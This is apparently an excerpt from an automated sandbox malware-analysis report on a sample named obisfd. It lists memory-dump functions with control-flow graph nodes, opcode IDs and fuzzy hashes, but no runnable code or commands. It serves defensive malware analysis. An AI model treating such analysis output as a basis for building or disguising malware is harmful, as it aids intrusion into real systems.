                                                                                            control_flow_graph 2946 4f82b0-4f82d0 2947 4f82d7-4f8368 2946->2947 2948 4f82d2 2946->2948 2952 4f836e-4f8384 2947->2952 2953 4f8728-4f875a 2947->2953 2948->2947 3004 4f8387 call 309330 2952->3004 3005 4f8387 call 309672 2952->3005 2956 4f838c-4f839e 3006 4f83a0 call 30dd50 2956->3006 3007 4f83a0 call 30dd41 2956->3007 3008 4f83a0 call 30e133 2956->3008 2957 4f83a5-4f83c0 2959 4f83c7-4f83d0 2957->2959 2960 4f83c2 2957->2960 2961 4f871b-4f8721 2959->2961 2960->2959 2962 4f8727 2961->2962 2963 4f83d5-4f8493 2961->2963 2962->2953 2970 4f854f-4f85a9 2963->2970 2971 4f8499-4f8507 2963->2971 2982 4f85aa-4f861d 2970->2982 2980 4f854a-4f854d 2971->2980 2981 4f8509-4f8549 2971->2981 2980->2982 2981->2980 2989 4f8706-4f8711 2982->2989 2990 4f8623-4f8705 2982->2990 2991 4f8718 2989->2991 2992 4f8713 2989->2992 2990->2989 2991->2961 2992->2991 3004->2956 3005->2956 3006->2957 3007->2957 3008->2957
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0af7b5970267a0e29c537e5d10ad6609215c00b98bb7ac114ad24068690f37a3
                                                                                            • Instruction ID: d196b7d015d2119f814762d9cf84dbc15f3205caf3d6345138ddb5059d445afc
                                                                                            • Opcode Fuzzy Hash: 0af7b5970267a0e29c537e5d10ad6609215c00b98bb7ac114ad24068690f37a3
                                                                                            • Instruction Fuzzy Hash: B1D1B274E002188FDB54DFA5C895BADBBB2FF89300F5081AAD409AB355DB359D81CF54
                                                                                            Function 0030E8A8 Relevance: .3, Instructions: 277COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ce40f9298894dde147703618092de63b6c40db16118ce132f5ed0e5c70f5f27f
                                                                                            • Instruction ID: c2de52b16b2056fcfabbe9e5797d831522afe77714683e441390f7256e98d61e
                                                                                            • Opcode Fuzzy Hash: ce40f9298894dde147703618092de63b6c40db16118ce132f5ed0e5c70f5f27f
                                                                                            • Instruction Fuzzy Hash: E5D1CE74E01218CFDB54DFA5C990BADBBB2FF89300F5485A9D809AB355DB356A81CF10
                                                                                            Function 006B68E8 Relevance: .3, Instructions: 268COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: b8965ee6ec23c04942c2652efff0626b212e48787e1332538a322f31d7cdfccc
                                                                                            • Instruction ID: 8da3a54b9af51631b321f44de4159f01fc08ffff4faaeaec2fd1f6419037dc5c
                                                                                            • Opcode Fuzzy Hash: b8965ee6ec23c04942c2652efff0626b212e48787e1332538a322f31d7cdfccc
                                                                                            • Instruction Fuzzy Hash: 95C1B074E01218CFDB54DFA5C995B9DBBB2BF89300F2084A9E409AB355DB35AE81CF50
                                                                                            Function 006E2E78 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73d2adbaf664be79b7d29d3f824c242b5848f7642aed47ed12d7a35cbc1c5969
                                                                                            • Instruction ID: a5e78e35d574ca7ec10e2b2c1096ce8d2fda94d684af179ec407821fe04620a2
                                                                                            • Opcode Fuzzy Hash: 73d2adbaf664be79b7d29d3f824c242b5848f7642aed47ed12d7a35cbc1c5969
                                                                                            • Instruction Fuzzy Hash: 85A19174E012288FEB68CF6AD944BDDBBF2AF89300F14C1AAD408A7350DB745A85CF11
                                                                                            Function 006E49F8 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 255433086d901085200448ccf9af4ae092e35fe39475081ec975895659279520
                                                                                            • Instruction ID: 07ec20caa24b0f6eec48b2c5980d87cbe9831fbbd1e38555cc549b32d1a1b184
                                                                                            • Opcode Fuzzy Hash: 255433086d901085200448ccf9af4ae092e35fe39475081ec975895659279520
                                                                                            • Instruction Fuzzy Hash: 73A1A470E012188FEB68CF6AC944BDDFBF2AF89300F14C1A9D408A7254DB345A85CF51
                                                                                            Function 006E50D8 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 36cd270d408f649e72572f415f7ac42ae40010832fbec685a6cdbbac59f3411b
                                                                                            • Instruction ID: 555e80e02aac4227818c750d185e57f999e36cc3746f4f37f73f4884b7508acb
                                                                                            • Opcode Fuzzy Hash: 36cd270d408f649e72572f415f7ac42ae40010832fbec685a6cdbbac59f3411b
                                                                                            • Instruction Fuzzy Hash: 0CA1A474D01618CFEB68CF6AD944BDDBBF2AF89300F14C1AAD409A7250EB745A85CF51
                                                                                            Function 006E3C38 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f8b6f5041ebc0f88abdac6457fe6b83a91cb273ed42e70be8ae9865fd1c8d29
                                                                                            • Instruction ID: 90e38cd90dfc34cb8e1fc3ad5a352ed8c502f46b4d297f3b5880b1cfc53e2317
                                                                                            • Opcode Fuzzy Hash: 3f8b6f5041ebc0f88abdac6457fe6b83a91cb273ed42e70be8ae9865fd1c8d29
                                                                                            • Instruction Fuzzy Hash: 1CA19474E012698FEB68CF6AD944BDDFBF2AF89300F14C1AAD408A7250DB745A85CF51
                                                                                            Function 006E4318 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c041cb505c9605a5fed37b27e61df1c75879b480b7520cf396579d3f02335ca6
                                                                                            • Instruction ID: 6a0fd3a0186f697c6bec5c53edf94021954dc1f749957c5886599f562a515456
                                                                                            • Opcode Fuzzy Hash: c041cb505c9605a5fed37b27e61df1c75879b480b7520cf396579d3f02335ca6
                                                                                            • Instruction Fuzzy Hash: 41A19274E01268CFEB68CF6AD944BDDBBF2AF89300F14C1AAD408A7250DB345A85CF51
                                                                                            Function 00309330 Relevance: .2, Instructions: 220COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 31d0c5bacecbe566658bdd5b96d2b6f1f8993d2206f6906ebf860a581781b423
                                                                                            • Instruction ID: 40cf1c8a731ac621f60c059dad43b26355f251dcaca49cb68786c05176d16e32
                                                                                            • Opcode Fuzzy Hash: 31d0c5bacecbe566658bdd5b96d2b6f1f8993d2206f6906ebf860a581781b423
                                                                                            • Instruction Fuzzy Hash: 48A13570D01208CFEB14DFA9C994BDDBBB1FF89314F20866AE409AB291DB749985CF54
                                                                                            Function 006E3558 Relevance: .2, Instructions: 219COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 357f620fe771ae6c185df9686aaf6353b0b81b370103cd1d16033762b95ffe65
                                                                                            • Instruction ID: db865b0b8dc5f6d1bf66d1d680fa8941f174a03d7b55ec4472f1614dbb7da76e
                                                                                            • Opcode Fuzzy Hash: 357f620fe771ae6c185df9686aaf6353b0b81b370103cd1d16033762b95ffe65
                                                                                            • Instruction Fuzzy Hash: 0BA194B5E012288FEB68CF6AC944B9DBBF2AF89300F14C1A9D408A7350DB745A85CF55
                                                                                            Function 006E57B8 Relevance: .2, Instructions: 219COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c21e56eae6e6a49fbdc2e2780c00daab78f0a07a8a4ee9ed1fcd44d0b564ba9d
                                                                                            • Instruction ID: 80d88469f665fb5ab29a485a7d8b37a489585b9ed9edb7eac4ddfd1d19d1df1a
                                                                                            • Opcode Fuzzy Hash: c21e56eae6e6a49fbdc2e2780c00daab78f0a07a8a4ee9ed1fcd44d0b564ba9d
                                                                                            • Instruction Fuzzy Hash: 07A19270E016588FEB68CF6AC984BDDFBF2AF89304F14C1AAD409A7250DB745A85CF51
                                                                                            Function 00309672 Relevance: .2, Instructions: 202COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923412481.0000000000300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_300000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 976d80dea1789e043bdca15c7dc0b21ebdfadbf6fca4b501e742f2da9f954bbb
                                                                                            • Instruction ID: 797044929458b6f0a63626b0af75d832832eac80f83e1ff953945180a42800e2
                                                                                            • Opcode Fuzzy Hash: 976d80dea1789e043bdca15c7dc0b21ebdfadbf6fca4b501e742f2da9f954bbb
                                                                                            • Instruction Fuzzy Hash: 28912470D01208CFEB10DFA5C994BDDBBB1FF89314F20826AE009AB292DB759985CF14
                                                                                            Function 0069A120 Relevance: .2, Instructions: 200COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923549329.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_690000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 81dfb8bb51bda187f5047fc527f5f0d759b409216e4a50a34b4247dc0c4b7dab
                                                                                            • Instruction ID: 4fc3bbb320cdf78dbb0315939cc27829100bfcd40969c946765e675e30cd8adb
                                                                                            • Opcode Fuzzy Hash: 81dfb8bb51bda187f5047fc527f5f0d759b409216e4a50a34b4247dc0c4b7dab
                                                                                            • Instruction Fuzzy Hash: 5C81C374E00218CFDB14DFA9C890BADBBB2FF88300F248569D415AB399DB356946CF50
                                                                                            Function 006E354A Relevance: .2, Instructions: 176COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 779ca2a5048e0ec6215a4dc28e384d7765fd83e54e440c9cadbac2c7322bf8e7
                                                                                            • Instruction ID: 3e43f735d8c49c189b658ae4d925eabd65669a8c16f4824648eba6189e64f96f
                                                                                            • Opcode Fuzzy Hash: 779ca2a5048e0ec6215a4dc28e384d7765fd83e54e440c9cadbac2c7322bf8e7
                                                                                            • Instruction Fuzzy Hash: 10818675E016288FEB68CF66C954B9EBBF2AF89300F14C1E9D408A7354DB705A85CF51
                                                                                            Function 006E57A8 Relevance: .2, Instructions: 167COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82d7662c3e7996e1c8e55c645172e955cf36bb454c9364995ee6cc96468ea75e
                                                                                            • Instruction ID: eafcf5375099f74b997fd8d43629a220a1506a4eb08298da566461c7c2b7cbb0
                                                                                            • Opcode Fuzzy Hash: 82d7662c3e7996e1c8e55c645172e955cf36bb454c9364995ee6cc96468ea75e
                                                                                            • Instruction Fuzzy Hash: 45719470E016188FEB68CF6AC954B9EFBF2AF89304F14C1E9D409A7254DB705A85CF50
                                                                                            Function 006E4308 Relevance: .1, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: de89d4a192a041b9f4423c355ce28c7b235bf12afa87a48ca41bee77dd04e638
                                                                                            • Instruction ID: 8b0709d7473964e337d6d94c9e7232c2d452ad407266d0756cc2504843994902
                                                                                            • Opcode Fuzzy Hash: de89d4a192a041b9f4423c355ce28c7b235bf12afa87a48ca41bee77dd04e638
                                                                                            • Instruction Fuzzy Hash: 0C4179B1E016188BEB68CF6BD8447DEFAF3AFC8304F14C1AAD50CA6254DB740A858F51
                                                                                            Function 006E2E68 Relevance: .1, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32e9995dd833a5371376a57ea54885dc739053dc63db0726e2692cb58c1053c9
                                                                                            • Instruction ID: 041c4ff6a8ed821f95967b8208eaef69ade7fceb1857b75d481e4f8b86c1539c
                                                                                            • Opcode Fuzzy Hash: 32e9995dd833a5371376a57ea54885dc739053dc63db0726e2692cb58c1053c9
                                                                                            • Instruction Fuzzy Hash: 41416771E016588BEB28CF6BC95479EFAF3AFC9300F14C1A9D40CA6254DB741A858F51
                                                                                            Function 006E3C28 Relevance: .1, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f725819547eb550d49d273b84e678cb7aaaa22ccc85f6fee82cdb653c1fd733f
                                                                                            • Instruction ID: 2b93c027a0a4bc0d6e45465630e08641a44398e4a972bd42d234baf0a47f53bd
                                                                                            • Opcode Fuzzy Hash: f725819547eb550d49d273b84e678cb7aaaa22ccc85f6fee82cdb653c1fd733f
                                                                                            • Instruction Fuzzy Hash: 49416871E016588FEB68CF6BC95479EFAF3AFC9300F14C1AAD50CA6254EB740A858F51
                                                                                            Function 006E49E9 Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f52dcd220c60d460fbb5cd4dda6ae57db39e2e1b62f70e067462764ff75c6638
                                                                                            • Instruction ID: 1ae7a1121282db0765112a1ab51efbba749599dc76c7e5e93886d7aa022d9c51
                                                                                            • Opcode Fuzzy Hash: f52dcd220c60d460fbb5cd4dda6ae57db39e2e1b62f70e067462764ff75c6638
                                                                                            • Instruction Fuzzy Hash: 7D418871E016188FEB68CF6BD95479EFAF3AFC9300F14C1AAD50CA6254EB740A858F51
                                                                                            Function 006E50C8 Relevance: .1, Instructions: 108COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923591418.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6e0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e75a47c67debb95db99cfb6552dd75cdcf3d0bd9891b2d73a80ee7b02e8aae20
                                                                                            • Instruction ID: 6a10ff15296c8f486d72d9e0db924ea9572b50a05ab7425c193c091e48668a19
                                                                                            • Opcode Fuzzy Hash: e75a47c67debb95db99cfb6552dd75cdcf3d0bd9891b2d73a80ee7b02e8aae20
                                                                                            • Instruction Fuzzy Hash: 15417871E016588BEB68CF5BD8547DEFAF3AFC8300F14C1AAC50CA6254EB740A858F51
                                                                                            Function 004F95C0 Relevance: .1, Instructions: 101COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923495522.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_4f0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 007fd6e338ea6d8f54643f47584702d596a4c5486a3cfa7dc856d646d6ac1cb1
                                                                                            • Instruction ID: 070779bb36328f2c2f2329757863455b56c971ef98783d6f1b57427792de7d60
                                                                                            • Opcode Fuzzy Hash: 007fd6e338ea6d8f54643f47584702d596a4c5486a3cfa7dc856d646d6ac1cb1
                                                                                            • Instruction Fuzzy Hash: C641E270E012088FDB08DFAAD9947AEBBF2BF89300F14C16AD518BB254DB355946CF54
                                                                                            Function 006B2CEF Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1232 6b2cef-6b2cf7 1233 6b2cf9-6b2d09 1232->1233 1234 6b2c84-6b2c95 1232->1234 1241 6b2d0e-6b2d1b 1233->1241 1238 6b2c9e-6b2c9f 1234->1238 1239 6b2c97 1234->1239 1238->1241 1239->1238 1240 6b2c52-6b2c64 1239->1240 1243 6b2c6d-6b2c6e 1240->1243 1244 6b2c66 1240->1244 1258 6b2d23-6b2d27 1241->1258 1243->1241 1244->1238 1244->1240 1244->1243 1246 6b2c2a-6b2c4a LdrInitializeThunk 1244->1246 1247 6b2bc8-6b2bd2 1244->1247 1248 6b2c4c-6b2c4d 1244->1248 1249 6b2c01-6b2c19 1244->1249 1250 6b2b44-6b2b4b 1244->1250 1251 6b2c1b-6b2c28 1244->1251 1252 6b2bda-6b2beb 1244->1252 1253 6b2bd8 1244->1253 1254 6b2b52-6b2b6b 1244->1254 1255 6b2b70-6b2b83 1244->1255 1256 6b2b37-6b2b3d 1244->1256 1257 6b2bd5-6b2bd6 1244->1257 1246->1248 1247->1257 1248->1258 1249->1246 1249->1251 1250->1254 1251->1248 1262 6b2bed 1252->1262 1263 6b2bf2 1252->1263 1264 6b2bd9 1253->1264 1261 6b2bf5-6b2bfb 1254->1261 1259 6b2b8a-6b2bc6 1255->1259 1260 6b2b85 1255->1260 1256->1250 1257->1249 1266 6b2d29-6b2d2e 1258->1266 1267 6b2d2f-6b2d38 1258->1267 1259->1247 1259->1264 1260->1259 1261->1249 1261->1255 1262->1263 1263->1261 1264->1252 1266->1267
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9a53d7169f6a0a6a5a99d74b646850d0c7bfa7ff148ee75eb9337b8a1820a64e
                                                                                            • Instruction ID: 6d13c2b98ccf2157d62cd13521e08479c283411097fa51b4a0405ccafdbb6977
                                                                                            • Opcode Fuzzy Hash: 9a53d7169f6a0a6a5a99d74b646850d0c7bfa7ff148ee75eb9337b8a1820a64e
                                                                                            • Instruction Fuzzy Hash: B55133B4D05209CFCB05CFA9D4946EDBBF2BF48315F209629E019BB2A4D7749886CF10
                                                                                            Function 006B2AD8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1272 6b2ad8-6b2afd 1273 6b2aff 1272->1273 1274 6b2b04-6b2b6b 1272->1274 1273->1274 1279 6b2bf5-6b2bfb 1274->1279 1280 6b2c01-6b2c19 1279->1280 1281 6b2b70-6b2b83 1279->1281 1282 6b2c1b-6b2c28 1280->1282 1283 6b2c2a-6b2c4a LdrInitializeThunk 1280->1283 1284 6b2b8a-6b2bc6 1281->1284 1285 6b2b85 1281->1285 1286 6b2c4c-6b2d27 1282->1286 1283->1286 1294 6b2bd9-6b2beb 1284->1294 1295 6b2bc8-6b2bd6 1284->1295 1285->1284 1289 6b2d29-6b2d2e 1286->1289 1290 6b2d2f-6b2d38 1286->1290 1289->1290 1298 6b2bed 1294->1298 1299 6b2bf2 1294->1299 1295->1280 1298->1299 1299->1279
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(000000FF), ref: 006B2C3A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: ae0e485dc43afbc3d85ce68c739a54600d78f21e4dadea99c618f6fbc686fe17
                                                                                            • Instruction ID: 44ce2532e5921d906a6af5ededffd381d701684b988f4d9f448cac1e9526e503
                                                                                            • Opcode Fuzzy Hash: ae0e485dc43afbc3d85ce68c739a54600d78f21e4dadea99c618f6fbc686fe17
                                                                                            • Instruction Fuzzy Hash: FE5116B4D01218CFDB18CFAAD8946DDBBF2BF88314F10C529E415AB294DB749985CF50
                                                                                            Function 006B2C73 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1300 6b2c73-6b2c7d 1301 6b2c89-6b2c8c 1300->1301 1302 6b2c7f-6b2c87 1300->1302 1303 6b2c8f-6b2c95 1301->1303 1302->1303 1304 6b2c9e-6b2c9f 1303->1304 1305 6b2c97 1303->1305 1307 6b2d0e-6b2d1b 1304->1307 1305->1304 1306 6b2c52-6b2c64 1305->1306 1308 6b2c6d-6b2c6e 1306->1308 1309 6b2c66 1306->1309 1323 6b2d23-6b2d27 1307->1323 1308->1307 1309->1304 1309->1306 1309->1308 1311 6b2c2a-6b2c4a LdrInitializeThunk 1309->1311 1312 6b2bc8-6b2bd2 1309->1312 1313 6b2c4c-6b2c4d 1309->1313 1314 6b2c01-6b2c19 1309->1314 1315 6b2b44-6b2b4b 1309->1315 1316 6b2c1b-6b2c28 1309->1316 1317 6b2bda-6b2beb 1309->1317 1318 6b2bd8 1309->1318 1319 6b2b52-6b2b6b 1309->1319 1320 6b2b70-6b2b83 1309->1320 1321 6b2b37-6b2b3d 1309->1321 1322 6b2bd5-6b2bd6 1309->1322 1311->1313 1312->1322 1313->1323 1314->1311 1314->1316 1315->1319 1316->1313 1327 6b2bed 1317->1327 1328 6b2bf2 1317->1328 1329 6b2bd9 1318->1329 1326 6b2bf5-6b2bfb 1319->1326 1324 6b2b8a-6b2bc6 1320->1324 1325 6b2b85 1320->1325 1321->1315 1322->1314 1331 6b2d29-6b2d2e 1323->1331 1332 6b2d2f-6b2d38 1323->1332 1324->1312 1324->1329 1325->1324 1326->1314 1326->1320 1327->1328 1328->1326 1329->1317 1331->1332
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.923577642.00000000006B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_7_2_6b0000_obisfd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3d29eaef9509c4b7dd6ebf8bf072b6cf87a15f9fb25dab32551c6eb5c7b852c5
                                                                                            • Instruction ID: 949fa100bbd1f2a7f8b1a48f347b20f3350b975d97437f85266464c45a86d107
                                                                                            • Opcode Fuzzy Hash: 3d29eaef9509c4b7dd6ebf8bf072b6cf87a15f9fb25dab32551c6eb5c7b852c5
                                                                                            • Instruction Fuzzy Hash: DF5100B4D01209CFDB14CFA9D4946EDBBF2BF49314F20962AE425BB2A4D7749886CF10
                                                                                            Function 0030E133 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
